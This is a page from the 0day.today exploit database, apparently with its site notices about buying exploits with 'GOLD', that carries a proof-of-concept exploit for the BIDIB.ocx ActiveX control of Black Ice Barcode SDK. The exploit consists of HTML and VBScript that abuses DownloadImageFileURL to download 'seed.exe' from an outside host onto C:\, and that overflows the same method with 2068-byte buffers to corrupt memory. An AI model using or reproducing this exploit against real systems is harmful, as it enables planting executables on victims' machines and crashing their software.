0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Black Ice Software Inc Barcode SDK (BIDIB.ocx) Multiple Vulns
============================================================= Black Ice Software Inc Barcode SDK (BIDIB.ocx) Multiple Vulns ============================================================= ----------------------------------------------------------------------------- Black Ice Software Inc Barcode SDK (BIDIB.ocx) Arbitrary File Download and Memory Corruption url: http://www.blackice.com File : BIDIB.ocx Ver. : 10.9.3.0 CLSID: {D2797899-BE27-4CDB-892F-4FDC26EA9BA9} Mark.: RegKey Safe for Script: True RegKey Safe for Init: True Implements IObjectSafety: False Author: shinnai mail: shinnai[at]autistici[dot]org site: http://shinnai.altervista.org This was written for educational purpose. Use it at your own risk. Author will be not responsible for any damage. Windows XP Professional SP3 fully patched, with Internet Explorer 7 Windows 2k Professional SP3 fully patched, with Internet Explorer 6 In memory of rgod ----------------------------------------------------------------------------- <object classid='clsid:D2797899-BE27-4CDB-892F-4FDC26EA9BA9' id='test'></object> <input language=VBScript onclick=tryMe() type=button value='Click here to start the arbitrary file download test'> <input language=VBScript onclick=MemoryCorruption() type=button value='Click here to start the memory corruption test'> <script language='vbscript'> Sub tryMe test.DownloadImageFileURL "http://somesite.com/seed.exe", "C:\seed.exe" End Sub </script> <script language='vbscript'> Sub MemoryCorruption buff_0 = String(2068, "A") buff_1 = String(2068, "B") test.DownloadImageFileURL buff_0, buff_1 End Sub </script> # 0day.today [2024-11-16] #